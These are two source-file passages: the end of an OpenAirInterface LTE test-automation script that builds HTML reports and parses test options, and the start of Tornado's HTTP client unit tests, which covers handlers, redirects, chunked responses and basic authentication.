self.htmlFile.write(' <td><span class="label label-default">' + self.eNBCpuMHz + '</span></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=5 bgcolor = "#33CCFF">Final Status</th>\n')
if passStatus:
self.htmlFile.write(' <th colspan=3 bgcolor="green"><font color="white">PASS <span class="glyphicon glyphicon-ok"></span></font></th>\n')
else:
self.htmlFile.write(' <th colspan=3 bgcolor="red"><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <div class="well well-lg">End of Test Report -- Copyright <span class="glyphicon glyphicon-copyright-mark"></span> 2018 <a href="http://www.openairinterface.org/">OpenAirInterface</a>. All Rights Reserved.</div>\n')
self.htmlFile.write('</div></body>\n')
self.htmlFile.write('</html>\n')
self.htmlFile.close()
def CreateHtmlTestRow(self, options, status, processesStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
if (processesStatus == 0):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
elif (processesStatus == ENB_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process not found</td>\n')
elif (processesStatus == ENB_PROCESS_SEG_FAULT):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process ended in Segmentation Fault</td>\n')
elif (processesStatus == ENB_PROCESS_ASSERTION):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process ended in Assertion</td>\n')
elif (processesStatus == ENB_PROCESS_REALTIME_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process faced Real Time issue(s)</td>\n')
elif (processesStatus == ENB_PROCESS_NOLOGFILE_TO_ANALYZE):
self.htmlFile.write(' <td bgcolor = "orange" >OK</td>\n')
elif (processesStatus == HSS_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - HSS process not found</td>\n')
elif (processesStatus == MME_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - MME process not found</td>\n')
elif (processesStatus == SPGW_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - SPGW process not found</td>\n')
elif (processesStatus == UE_IP_ADDRESS_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - Could not retrieve UE IP address</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
if (len(str(self.htmleNBFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Reestablishment|Could not copy eNB logfile', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' +
cellBgColor + '">' + self.htmleNBFailureMsg + '</pre></td>\n')
self.htmleNBFailureMsg = ''
else:
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
def CreateHtmlTestRowQueue(self, options, status, ue_status, ue_queue):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
addOrangeBK = False
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
addOrangeBK = True
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
i = 0
while (i < self.htmlUEConnected):
if (i < ue_status):
if (not ue_queue.empty()):
if (addOrangeBK):
self.htmlFile.write(' <td bgcolor = "orange" >' + str(ue_queue.get()).replace('white', 'orange') + '</td>\n')
else:
self.htmlFile.write(' <td>' + str(ue_queue.get()) + '</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
#-----------------------------------------------------------
# ShowTestID()
#-----------------------------------------------------------
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# Usage()
#-----------------------------------------------------------
def Usage():
print('------------------------------------------------------------')
print('main.py Ver:' + Version)
print('------------------------------------------------------------')
print('Usage: python main.py [options]')
print(' --help Show this help.')
print(' --mode=[Mode]')
print(' TesteNB')
print(' InitiateHtml, FinalizeHtml')
print(' TerminateeNB, TerminateUE, TerminateHSS, TerminateMME, TerminateSPGW')
print(' LogCollectBuild, LogCollecteNB, LogCollectHSS, LogCollectMME, LogCollectSPGW, LogCollectPing, LogCollectIperf')
print(' --eNBIPAddress=[eNB\'s IP Address]')
print(' --eNBRepository=[eNB\'s Repository URL]')
print(' --eNBBranch=[eNB\'s Branch Name]')
print(' --eNBCommitID=[eNB\'s Commit Number]')
print(' --eNB_AllowMerge=[eNB\'s Allow Merge Request (with target branch)]')
print(' --eNBTargetBranch=[eNB\'s Target Branch in case of a Merge Request]')
print(' --eNBUserName=[eNB\'s Login User Name]')
print(' --eNBPassword=[eNB\'s Login Password]')
print(' --eNBSourceCodePath=[eNB\'s Source Code Path]')
print(' --EPCIPAddress=[EPC\'s IP Address]')
print(' --EPCUserName=[EPC\'s Login User Name]')
print(' --EPCPassword=[EPC\'s Login Password]')
print(' --EPCSourceCodePath=[EPC\'s Source Code Path]')
print(' --EPCType=[EPC\'s Type: OAI or ltebox]')
print(' --ADBIPAddress=[ADB\'s IP Address]')
print(' --ADBUserName=[ADB\'s Login User Name]')
print(' --ADBPassword=[ADB\'s Login Password]')
print(' --XMLTestFile=[XML Test File to be run]')
print('------------------------------------------------------------')
def CheckClassValidity(action,id):
if action != 'Build_eNB' and action != 'Initialize_eNB' and action != 'Terminate_eNB' and action != 'Initialize_UE' and action != 'Terminate_UE' and action != 'Attach_UE' and action != 'Detach_UE' and action != 'Ping' and action != 'Iperf' and action != 'Reboot_UE' and action != 'Initialize_HSS' and action != 'Terminate_HSS' and action != 'Initialize_MME' and action != 'Terminate_MME' and action != 'Initialize_SPGW' and action != 'Terminate_SPGW' and action != 'Initialize_CatM_module' and action != 'Terminate_CatM_module' and action != 'Attach_CatM_module' and action != 'Detach_CatM_module' and action != 'Ping_CatM_module' and action != 'IdleSleep':
logging.debug('ERROR: test-case ' + id + ' has wrong class ' + action)
return False
return True
def GetParametersFromXML(action):
if action == 'Build_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
if action == 'Initialize_eNB':
SSH.Initialize_eNB_args = test.findtext('Initialize_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
if action == 'Terminate_eNB':
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
if action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
SSH.nbMaxUEtoAttach = -1
else:
SSH.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
if action == 'Ping' or action == 'Ping_CatM_module':
SSH.ping_args = test.findtext('ping_args')
SSH.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
if action == 'Iperf':
SSH.iperf_args = test.findtext('iperf_args')
SSH.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
SSH.iperf_profile = test.findtext('iperf_profile')
if (SSH.iperf_profile is None):
SSH.iperf_profile = 'balanced'
else:
if SSH.iperf_profile != 'balanced' and SSH.iperf_profile != 'unbalanced' and SSH.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + SSH.iperf_profile)
SSH.iperf_profile = 'balanced'
if action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
SSH.idle_sleep_time = 5
else:
SSH.idle_sleep_time = int(string_field)
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# Parameter Check
#-----------------------------------------------------------
mode = ''
SSH = SSHConnection()
argvs = sys.argv
argc = len(argvs)
while len(argvs) > 1:
myArgv = argvs.pop(1) # 0th is this file's name
if re.match('^\-\-help$', myArgv, re.IGNORECASE):
Usage()
sys.exit(0)
elif re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE)
mode = matchReg.group(1)
elif re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBIPAddress = matchReg.group(1)
elif re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBRepository = matchReg.group(1)
elif re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE)
doMerge = matchReg.group(1)
if ((doMerge == 'true') or (doMerge == 'True')):
SSH.eNB_AllowMerge = True
elif re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBBranch = matchReg.group(1)
elif re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE)
SSH.eNBCommitID = matchReg.group(1)
elif re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE)
SSH.eNBTargetBranch = matchReg.group(1)
elif re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBUserName = matchReg.group(1)
elif re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBPassword = matchReg.group(1)
elif re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCIPAddress = matchReg.group(1)
elif re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCBranch = matchReg.group(1)
elif re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCUserName = matchReg.group(1)
elif re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCPassword = matchReg.group(1)
elif re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE)
if re.match('OAI', matchReg.group(1), re.IGNORECASE) or re.match('ltebox', matchReg.group(1), re.IGNORECASE):
SSH.EPCType = matchReg.group(1)
else:
sys.exit('Invalid EPC Type: ' + matchReg.group(1) + ' -- (should be OAI or ltebox)')
elif re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBIPAddress = matchReg.group(1)
elif re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBUserName = matchReg.group(1)
elif re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBPassword = matchReg.group(1)
elif re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE)
SSH.testXMLfiles.append(matchReg.group(1))
SSH.nbTestXMLfiles += 1
elif re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE)
finalStatus = matchReg.group(1)
if ((finalStatus == 'true') or (finalStatus == 'True')):
SSH.finalStatus = True
else:
Usage()
sys.exit('Invalid Parameter: ' + myArgv)
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectIperf()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
count = 0
while (count < SSH.nbTestXMLfiles):
xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[count]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-' + str(count)))
SSH.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
count += 1
SSH.CreateHtmlHeader()
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
SSH.CreateHtmlFooter(SSH.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBRepository == '' or SSH.eNBBranch == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '' or SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '' or SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
if (SSH.EPCIPAddress != 'none'):
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, sys.path[0] + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, sys.path[0] + "/active_net_interfaces.awk", "/tmp")
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (SSH.nbTestXMLfiles != 1):
xml_test_file = sys.path[0] + "/test_case_list.xml"
else:
xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (SSH.nbTestXMLfiles == 1):
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
SSH.CreateHtmlTabHeader()
for test_case_id in todo_tests:
for test in all_tests:
id = test.get('id')
if test_case_id != id:
continue
SSH.testCase_id = id
SSH.desc = test.findtext('desc')
action = test.findtext('class')
if (CheckClassValidity(action, id) == False):
continue
SSH.ShowTestID()
GetParametersFromXML(action)
if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE':
terminate_ue_flag = False
SSH.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
SSH.BuildeNB()
elif action == 'Initialize_eNB':
SSH.InitializeeNB()
elif action == 'Terminate_eNB':
SSH.TerminateeNB()
elif action == 'Initialize_UE':
SSH.InitializeUE()
elif action == 'Terminate_UE':
SSH.TerminateUE()
elif action == 'Attach_UE':
SSH.AttachUE()
elif action == 'Detach_UE':
SSH.DetachUE()
elif action == 'Initialize_CatM_module':
SSH.InitializeCatM()
elif action == 'Terminate_CatM_module':
SSH.TerminateCatM()
elif action == 'Attach_CatM_module':
SSH.AttachCatM()
elif action == 'Detach_CatM_module':
SSH.TerminateCatM()
elif action == 'Ping_CatM_module':
SSH.PingCatM()
elif action == 'Ping':
SSH.Ping()
elif action == 'Iperf':
SSH.Iperf()
elif action == 'Reboot_UE':
SSH.RebootUE()
elif action == 'Initialize_HSS':
SSH.InitializeHSS()
elif action == 'Terminate_HSS':
SSH.TerminateHSS()
elif action == 'Initialize_MME':
SSH.InitializeMME()
elif action == 'Terminate_MME':
SSH.TerminateMME()
elif action == 'Initialize_SPGW':
SSH.InitializeSPGW()
elif action == 'Terminate_SPGW':
SSH.TerminateSPGW()
elif action == 'IdleSleep':
SSH.IdleSleep()
else:
sys.exit('Invalid action')
SSH.CreateHtmlTabFooter(True)
else:
Usage()
sys.exit('Invalid mode')
sys.exit(0)
|
httpclient_test.py
|
# -*- coding: utf-8 -*-
import base64
import binascii
from contextlib import closing
import copy
import threading
import datetime
from io import BytesIO
import time
import typing # noqa: F401
import unicodedata
import unittest
from tornado.escape import utf8, native_str
from tornado import gen
from tornado.httpclient import (
HTTPRequest,
HTTPResponse,
_RequestProxy,
HTTPError,
HTTPClient,
)
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import skipOnTravis
from tornado.web import Application, RequestHandler, url
from tornado.httputil import format_timestamp, HTTPHeaders
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish(
"Post arg1: %s, arg2: %s"
% (self.get_argument("arg1"), self.get_argument("arg2"))
)
class PutHandler(RequestHandler):
def put(self):
self.write("Put body: ")
self.write(self.request.body)
class RedirectHandler(RequestHandler):
def prepare(self):
self.write("redirects can have bodies too")
self.redirect(
self.get_argument("url"), status=int(self.get_argument("status", "302"))
)
class ChunkHandler(RequestHandler):
@gen.coroutine
def get(self):
self.write("asdf")
self.flush()
# Wait a bit to ensure the chunks are sent and received separately.
yield gen.sleep(0.01)
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get("User-Agent", "User agent not set"))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header("Content-Length", 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class PatchHandler(RequestHandler):
def patch(self):
"Return the request payload - so we can check it is being kept"
self.write(self.request.body)
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ("OTHER",) # type: ignore
def method(self):
self.write(self.request.method)
get = post = put = delete = options = patch = other = method # type: ignore
class SetHeaderHandler(RequestHandler):
def get(self):
# Use get_arguments for keys to get strings, but
# request.arguments for values to get bytes.
for k, v in zip(self.get_arguments("k"), self.request.arguments["v"]):
self.set_header(k, v)
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application(
[
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/put", PutHandler),
url("/redirect", RedirectHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
url("/patch", PatchHandler),
url("/set_header", SetHeaderHandler),
],
gzip=True,
)
def test_patch_receives_payload(self):
body = b"some patch data"
response = self.fetch("/patch", method="PATCH", body=body)
self.assertEqual(response.code, 200)
self.assertEqual(response.body, body)
@skipOnTravis
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = [] # type: typing.List[bytes]
response = self.fetch("/hello", streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST", body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = [] # type: typing.List[bytes]
response = self.fetch("/chunk", streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_basic_auth(self):
# This test data appears in section 2 of RFC 7617.
self.assertEqual(
self.fetch(
"/auth", auth_username="Aladdin", auth_password="open sesame"
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_explicit_mode(self):
self.assertEqual(
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic",
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_unicode(self):
# This test data appears in section 2.1 of RFC 7617.
self.assertEqual(
self.fetch("/auth", auth_username="test", auth_password="123£").body,
b"Basic dGVzdDoxMjPCow==",
)
# The standard mandates NFC. Give it a decomposed username
# and ensure it is normalized to composed form.
username = unicodedata.normalize("NFD", u"josé")
self.assertEqual(
self.fetch("/auth", auth_username=username, auth_password="səcrət").body,
b"Basic am9zw6k6c8mZY3LJmXQ=",
)
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf",
raise_error=True,
)
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
response = self.fetch(url)
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"), response.body)
def test_body_encoding(self):
unicode_body = u"\xe9"
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch(
"/echopost",
method="POST",
body=unicode_body,
headers={"Content-Type": "application/blah"},
